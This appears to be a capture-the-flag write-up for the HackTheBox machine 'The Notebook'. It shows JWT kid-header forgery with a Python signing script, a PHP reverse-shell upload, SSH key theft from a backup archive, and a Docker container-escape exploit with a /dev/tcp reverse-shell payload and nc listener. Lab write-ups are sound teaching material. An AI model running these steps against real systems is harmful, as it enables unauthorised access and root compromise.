The Notebook | HackTheBox Writeup


The Notebook is a medium Linux-based machine in HackTheBox by mostwanted002

User Part

Start with nmap scan found 3 open ports

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-06-21 00:37 EDT
Nmap scan report for
Host is up (0.18s latency).

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
| 256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_ 256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
5555/tcp open freeciv?
10010/tcp filtered rxapi
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
1 181.34 ms
2 181.72 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 28.02 seconds

Look into HTTP, this is the website I got with a login and registration page.

I registered with username admin1 and login to dashboard

I got a JWT in cookies i decoded it with

I found kid JWT Token.

This article gave me an idea about JWT kid exploitation.

FOr Exploitation, I created ssh key using ssh-keygen with the key name.

└─# ssh-keygen -t rsa -m PEM -f privKey.key
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in privKey.key
Your public key has been saved in
The key fingerprint is:
SHA256:1M/0JYqN2juJNBd8zEymR1rcKw4hjf0jLfaDLVeihAg root@kali
The key's randomart image is:
+---[RSA 3072]----+
| + . . |
| E o.+ * . |
| . ..+.#. ...|
| ... @B%ooo |
| Soo&==. |
| oo= * |
| ..+.+ . |
| . o. |
| .. |

I decoded the header part and encoded it with my local IP as kid value.

I changed the header with my newly created base64 code and the full JWT looks like this.

As you can see I only changed value of kid to my local machine.

I got a request from the IP.

└─# python3 -m http.server 7070 1
Serving HTTP on port 7070 ( ... - - [21/Jun/2021 01:06:36] "GET /privKey.key HTTP/1.1" 200 -

This time i changed body part with admin_cap to 1 from 0.

But I didn’t get any changes to the website. 

so I checked for python jwt and this website gave me an idea to create a python script.

i created a python script with the help of that website and look like this.

import jwt

PrivateKey = open("privKey.key","r").read().strip()
Headers = {"kid":""}
Payload = {"username":"admin","email":"admin@thmhtb","admin_cap":1}

Token = jwt.encode(Payload,PrivateKey,algorithm='RS256',headers=Headers)




by running the script i got this JWT

└─# python3

I verified that using

I got a new dashboard by adding the jwt in cookie and refreshing the page.

└─# python3 -m http.server 7070
Serving HTTP on port 7070 ( ... - - [21/Jun/2021 02:27:54] "GET /privKey.key HTTP/1.1" 200 -

Clicking on the admin panel shows i can upload files.

I uploaded php-reverse-shell and got shell back

i got some backup files from /var/backups.

a home.tar.gz which is suspicious.

so i downloaded it to my local machine and checked that.

www-data@thenotebook:/var/backups$ ls -la
ls -la
total 696
drwxr-xr-x 2 root root 4096 Jun 21 06:26 .
drwxr-xr-x 14 root root 4096 Feb 12 06:52 ..
-rw-r--r-- 1 root root 51200 Jun 21 06:25 alternatives.tar.0
-rw-r--r-- 1 root root 33252 Feb 24 08:53 apt.extended_states.0
-rw-r--r-- 1 root root 3609 Feb 23 08:58 apt.extended_states.1.gz
-rw-r--r-- 1 root root 3621 Feb 12 06:52 apt.extended_states.2.gz
-rw-r--r-- 1 root root 437 Feb 12 06:17 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Feb 12 06:52 dpkg.statoverride.0
-rw-r--r-- 1 root root 571460 Feb 24 08:53 dpkg.status.0
-rw------- 1 root root 693 Feb 17 13:18 group.bak
-rw------- 1 root shadow 575 Feb 17 13:18 gshadow.bak
-rw-r--r-- 1 root root 4373 Feb 17 09:02 home.tar.gz
-rw------- 1 root root 1555 Feb 12 06:24 passwd.bak
-rw------- 1 root shadow 1024 Feb 12 07:33 shadow.bak
└─# wget
--2021-06-21 02:41:03--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 4373 (4.3K) [application/gzip]
Saving to: ‘home.tar.gz’

home.tar.gz 100%[============================================>] 4.27K --.-KB/s in 0s

2021-06-21 02:41:03 (80.7 MB/s) - ‘home.tar.gz’ saved [4373/4373]


I extracted that and I got id_rsa from that.

└─# tar -xvf home.tar.gz

I got user shell by that id_rsa

└─# chmod 600 home/noah/.ssh/id_rsa

└─# ssh -i home/noah/.ssh/id_rsa noah@
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-135-generic x86_64)

* Documentation:
* Management:
* Support:

System information as of Mon Jun 21 06:43:59 UTC 2021

System load: 0.11 Processes: 205
Usage of /: 40.2% of 7.81GB Users logged in: 1
Memory usage: 19% IP address for ens160:
Swap usage: 0% IP address for docker0:

* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:

61 packages can be updated.
0 updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

Last login: Mon Jun 21 06:22:03 2021 from

Root Part

I check what commands current user can run with root privilege using sudo -l.

i got docker.

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass,

User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

i checked docker version and it’s old.

noah@thenotebook:~$ docker version
Version: 18.06.0-ce
API version: 1.38
Go version: go1.10.3
Git commit: 0ffa825
Built: Wed Jul 18 19:09:54 2018
OS/Arch: linux/amd64
Experimental: false
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.38/version: dial unix /var/run/docker.sock: connect: permission denied

I checked for the exploit and got CVE.

then i searched for POC in github.

I changed the code to get reverse shell in my machine by changing below mentioned code and uploaded to docker.


// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/ 0>&1"

noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 bash
root@90ce2b0668d0:/opt/webapp# cd /tmp/
root@90ce2b0668d0:/tmp# wget
--2021-06-21 07:33:46--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 2236814 (2.1M) [application/octet-stream]
Saving to: ‘main.1’

main.1 100%[============================================>] 2.13M 1023KB/s in 2.1s

2021-06-21 07:33:48 (1023 KB/s) - ‘main.1’ saved [2236814/2236814]


I executed and got back

root@90ce2b0668d0:/tmp# ./main 
[+] Overwritten /bin/sh successfully
[+] Found the PID: 57
[+] Successfully got the file handle
[+] Successfully got write handle &{0xc0000aa180}
noah@thenotebook:~$ sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
No help topic for '/bin/sh'

└─# nc -lvnp 4200
Listening on 4200
Connection received on 41878
bash: cannot set terminal process group (5722): Inappropriate ioctl for device
bash: no job control in this shell
<47f46e91675653d57a915006bf61ab13a6790e75f2c511ee9# cat /root/root.txt
cat /root/root.txt
Share on facebook
Share on twitter
Share on linkedin